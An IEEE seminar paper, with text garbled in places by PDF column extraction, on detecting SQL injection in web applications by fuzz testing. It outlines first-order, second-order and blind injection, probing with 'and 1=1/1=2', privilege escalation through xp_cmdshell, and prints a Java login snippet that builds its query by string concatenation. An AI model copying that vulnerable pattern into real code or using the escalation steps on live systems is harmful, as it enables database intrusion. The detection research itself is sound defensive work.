2024 International Seminar on Artificial Intelligence, Computer Technology and Control Engineering (ACTCE)

2024 International Seminar on Artificial Intelligence, Computer Technology and Control Engineering (ACTCE) | 979-8-3315-2171-4/24/$31.00 ©2024 IEEE | DOI: 10.1109/ACTCE65085.2024.00046

Research on Threat Detection of SQL Injection Attacks in Large Scale Web

Applications

Qinghao Li Zhida Guo Xiaoli Li

Huizhou Power Supply Corporation of Huizhou Power Supply Corporation of Huizhou Power Supply Corporation of
Guangdong Power Grid Co, Ltd., China Guangdong Power Grid Co, Ltd., China Guangdong Power Grid Co, Ltd., China
Huizhou, China Huizhou, China Huizhou, China
136367198@[Link] 107367195@[Link] 1396962588@[Link]

Ling Zhao Haobin Shen Yunsi Jiang

Huizhou Power Supply Corporation of Huizhou Power Supply Corporation of Huizhou Power Supply Corporation of
Guangdong Power Grid Co, Ltd., China Guangdong Power Grid Co, Ltd., China Guangdong Power Grid Co, Ltd., China
Huizhou, China Huizhou, China Huizhou, China
138967198@[Link] 107324755@[Link] 13456812588@[Link]

Abstract-Web applications are susceptible to SQL conventional when the next SQL statement calling the data is executed. To
injection, second-order injection, or blind injection attacks solve this problem, this paper uses the SQL injection
during operation, bring security threats to web system data, vulnerability detection model of fuzzy testing to detect and
user privacy, or sensitive data. To reduce the impact of SQL analyze the SQL injection attacks of different levels of
injection on system vulnerability attacks, a fuzzy testing
vulnerabilities, so as to improve the detection accuracy of
vulnerability detection technology for web applications and
servers is proposed. A fuzzy testing SQL injection vulnerability SQL injection attacks in Web applications.
detection model framework is established. The information
II. HOW SQL INJECTION ATTACKS ARE
collection module and fuzzy detection mod ule of the
vulnerability detection framework are used, and keyword IMPLEMENTED
encoding, mixed case encoding, and structured query language
A. SQL routine injection
(SQL) statement annotations are used to complete parameter
queries and hierarchical detection of level 0, level 1, and level 2 According to the different ways of SQL injection attack can
vulner abilities through detection processes such as be divided into SQL conventional injection, SQL second-
restructuring and bypassing. Finally, an experimental order injection, SQL blind injection and so on. Conventional
environment is built using soft ware and hardware such as SQL injection attacks modify the SQL statement executed by
ASP. NET, Microsoft Visual Studio, and IIS server to the database or embed the updatexml() malicious function in
demonstrate the SQL injection vulnerability detection model the SQL statement that is vulnerable to attack to complete
based on fuzzy testing technology. The simulation results show the error modification of SQL statement information and
that the SQL injection vulnerability detection model based on obtain valuable data information from the database. [1]
fuzzy testing method, compared to the SQL injection attack
updatex ml() malicious function includes xml_document,
detection method of web application source code based on
pro gram slicing technology, is validated in different levels of XPathstring, new_value and other parameters.
vulnerability detection. The detection effect is better (reaching xml_document represents the document name, XPathstring
over 90%). represents the string format the query locates, and new_value
represents the replacement qualifying value. For example,
Keywords-Web application; SQL injection attacks; fuzzy
during the data access process of the SQL Server database,
testing method; threat detection
the parameters of the access function inside the database are
I. INTRODUCTION incorrect. In this case, the normal SQL injection queries the
function with the error information, expands the
SQL injection vulnerability is one of the most serious
modification of an SQL statement, and inserts the
security risks to Web applications. Usually, attackers use
updatexml() malicious function.
attack methods such as server variables, Cookie registry, and
second-order injection to launch attacks when users submit B. SQL second order injection
input information to Web applications and modify structured SQL second-order injection attack is a vulnerability attack
query statements injected by first-order SQL. Or the second- mode compared with first-order SQL injection attack. In
order SQL injection information is stored in the database, but first-order SQL injection, malicious characters are written
is not executed immediately until the attack is launched into an SQL statement. After inserting and modifying the

979-8-3315-2171-4/24/$31.00 ©2024 IEEE 195

DOI 10.1109/ACTCE65085.2024.00046
Authorized licensed use limited to: Addis Ababa University. Downloaded on August 10,2025 at [Link] UTC from IEEE Xplore. Restrictions apply.
malicious string in the SQL statement, the propagation path (3) Determine the database type. Different types of
is from the source to the sink aggregation node. When an relational databases use different SQL injection attack modes.
external user submits the SQL statement as the requested For example, the methods of SQL injection attack on
party, SQL injection attacks are immediately triggered. SQL SQLServer, MySql, and Access databases are different. You
second-order injection attacks escape the malicious string need to determine the selected database type before
data of the inserted SQL statement and write the SQL launching SQL injection attacks.
statement to the database, but do not execute the attack (4) Permission extension. Expand user permissions to
immediately, but wait for the next SQL statement that calls access and manipulate the database after determining the
the data to launch the attack, that is, when the user calls the database type. For example, if the SQL Server database[7-8]
SQL statement again to use the stored malicious string data. is used as the database type for SQL injection attacks, check
To indirectly trigger SQL injection attacks. whether the source supports multi-statement query. If the
user has the highest permission (SuperAdmin,SA) and the
C. SQL blind annotation database has xp_cmdshell extended storage, The SQL shell
SQL blind injection refers to the client sending SQL command string can be executed to complete the user
injection request statements to the server, and obtaining permission expansion. If the user does not have the SA
information related to network pages and SQL statements permission, you need to use the logical value error query and
required for attacks according to the "true or fales" judgment method to determine the user permission field
information returned by the server [2-4]. If the Web value based on the obtained SQL Server database table name
application does not filter the above input data request and URL list name to expand the user permission.
variable, it can be used to forge the header value of the
HTTP network message and modify the SQL statement, IV. SIMULATION EXPERIMENT AND RESULT
including modifying the Web system user input information ANALYSIS
and Cookie content. When the modified SQL statement is In order to verify the effectiveness of SQL injection
executed on the server, the data stored in the background vulnerability detection of fuzzy testing technology, this
database may be deleted by mistake to complete the SQL paper uses software and hardware such as [Link],
blind injection attack. Microsoft Visual Studio, IIS server and SQLServ database
III. EXECUTION FLOW OF SQL INJECTION ATTACK to build an experimental environment. The BSQL Hacker
automatic injection tool was used to implement the Web
SQL injection attacks use the system form or URL query injection attack on Web applications. The vulnerability
string, insert special characters to construct illegal SQL detection effect of different levels of SQL injection attacks
statements, and as input parameters through the source was demonstrated by an on-campus library Web
source to the sink sink node, passed to the Web application. management program (JSPLibrary), and the SQL injection
When the server executes the input illegal SQL statement, vulnerability detection model based on fuzzy testing
the attacker will launch an attack on the xml document technology was demonstrated.
vulnerability stored in the relational database and The library Web management program (JSPLibrary) has
successfully implement the operation that he wants to 55 tested files and 3352 lines of background code. In the
execute. [3-6] For different relational databases, SQL process of first-order SQL injection, the background code of
injection attacks are different. The specific execution flow of Web application management program is preprocessed as
SQL injection attacks is as follows: input, and then test cases of different levels of vulnerability
(1) Determine whether the Web application can be SQL are used. Search and filter the collected information such as
injected. SQL injection attacks do not occur when a user URL list acquisition and HTML webpage, and detect the
accesses only the URL list and Web page content of a Web number of suspected paths of first-order SQL injection by
application. SQL injection attacks may occur only when the matching characters with test cases. Then, based on the
stored web page data is dynamically queried from the number of suspected first-order SQL injection paths, the
database. operation pairs of second-order SQL injection attacks are
(2) Find the SQL statement injection point. After obtained according to the sequential access operation rules of
confirming that the Web page can be SQL injected, use the file logical addresses. The detected second-order SQL
query condition statement with special parameters, such as injection attack threats are shown in Table 1.
"select * from books", enter the query statement in the
location where the SQL statement parameters are passed,
and find the SQL injection vulnerability in the web page.
The Web application is vulnerable to SQL injection attacks
and is vulnerable to SQL injection attacks only when error
information is returned for the and 1=1 and 1=2 query
conditions.

196

Authorized licensed use limited to: Addis Ababa University. Downloaded on August 10,2025 at [Link] UTC from IEEE Xplore. Restrictions apply.
 Table 1. Detection result of the number of first-order and V. SQL INJECTION VULNERABILITY INSTANCE
second-order SQL injection attack threats The function of the SQL injection vulnerability code is to
First Order SQL connect to the JDBC database and allow the user to log in to
Home Number
Second order injection Injection Number of the database when the user name and password received by
database of attack
operation on file suspected/confirmed the database are correct.
table vectors
threats (number)
SQL injection vulnerability code
[Link] d_category 10/8 249 [Link] static void main( String［］args) {
d_receive Program [Link]． forName( “com． mysql． jdbc． Driver”) ;
[Link]
address slicing
Number of
SQL [Link] url = “jdbc: mysql: / /localhost: 3306”;
suspected/confirmed
injection [Link] usr = “root”;
threats to second-
BookDaoImpljava d_book attack [Link] pwd = “123456”;
order SQL injection
detection [Link] conn =DriverManager． getConnection( url, usr, pwd) ;
results
[Link] stat = conn． createStatement( ) ;
12/7
[Link] d_user 4/4 [Link] sc = new Scanner( System． in) ;
[Link] usr = sc. nextLine( ) ;
[Link] pwd = [Link]( ) ;
After receiving the data to be tested extracted by the [Link] sql = “select * from users where user = ”+ usr +“and password = ”+
information collection module, the vulnerability detection pwd;
[Link] rs = [Link]( sql) ;
module sends a connection request for SQL injection attack [Link]( ) ;
to the Web application based on the above test cases of [Link]( ) ;
different vulnerability levels, reads the detection script file [Link]. close( ) ;
16.}
from the test case library, starts the SQL injection attack test,
modifies the SQL statement, and determines the VI. CONCLUSION
implementation of the attack according to the obtained
request feedback. Check whether the test case of the script Web applications can use SQL structured query language to
file matches the proprietary identifier of the URL that suffers establish interactive network communication connections
from this level of SQL injection attack. If the test case with background databases. However, when users access the
matches, it indicates that the level of SQL injection attack Web application network and process and execute SQL
vulnerability exists; otherwise, it indicates that the level of commands, external SQL injection attacks will construct
SQL injection attack vulnerability does not exist. The special input SQL statements for filtering and verifying the
detection result information is stored in the database, as application's input data vulnerabilities. To achieve the
shown in Figure 1. Then repeat the above steps until all URL purpose of controlling the server Web application and
list pages of the Web application obtained by the information obtaining important data information. Therefore, in the
collection module have completed the vulnerability execution of first-order and second-order SQL injection
ambiguity test for SQL injection attacks. attacks, special characters are inserted after the system form
or URL query string, and illegal data is inserted into the
system database and server side, SQL injection vulnerability
attacks of fuzzy testing are adopted
REFERENCES
[1] Huang Jinhao, DING Yuzhen, XIAO Liang, et al. A
cache scheduling scheme for embedded systems against
Denial of Service attacks based on reinforcement
learning [J]. Computer Science, 2020(7) : 282-286.
[2] Hu Fengsong, Li Cang, Wang Mian, et al. SQL
injection detection scheme based on Machine learning
[J]. Computer Engineering and Design, 2019(6) : 1554-
1558.
[3] Huang Kunming, ZHANG Lei, ZHAO Kui, et al.
Malicious code detection based on longest frequent
sequence mining [J]. Journal of Sichuan University
(Natural Science Edition), 2020(4) : 681-688.
[4] Dai Wei, Huang Jinjie, Liu Chang. Typical internal
network SQL injection attacks and prevention [J].
Network security Technology and application, 2020(2) :
16-18.
Figure 1. The execution flow of vulnerability fuzzy test module

197

Authorized licensed use limited to: Addis Ababa University. Downloaded on August 10,2025 at [Link] UTC from IEEE Xplore. Restrictions apply.
[5] Zhu Jingwen, Xu Jing, Chen Liang, et al. SQL Injection access patterns[J].ACM Transactions on Architecture
attack behavior detection based on Hidden Markov and Code Optimization,2019,16(3):1-24.
model [J]. Computer Applications and Software, [8] Meng J Y,Tarjan D,Skadron [Link] warp
2023(2) : 331-338+344. (in Chinese) subdivision for integrated branch and memory
[6] Qin Jin-Duan, LIU Jun-Liang, WANG Yue-Bing, et al. divergence tolerance[C]//Proceedings of the 37th annual
SQL injection identification and defense method based international symposium on Computer architecture -
on whitelist incremental matching [J]. Cyberspace ISCA '[Link] 19-23, 2010. Saint-Malo,[Link]
Security, 2021(Z5) : 49-64. York:ACM Press,2010.
[7] Li B C,Wei J Z,Sun J Z,et [Link] efficient GPU cache
architecture for applications with irregular memory

198

Authorized licensed use limited to: Addis Ababa University. Downloaded on August 10,2025 at [Link] UTC from IEEE Xplore. Restrictions apply.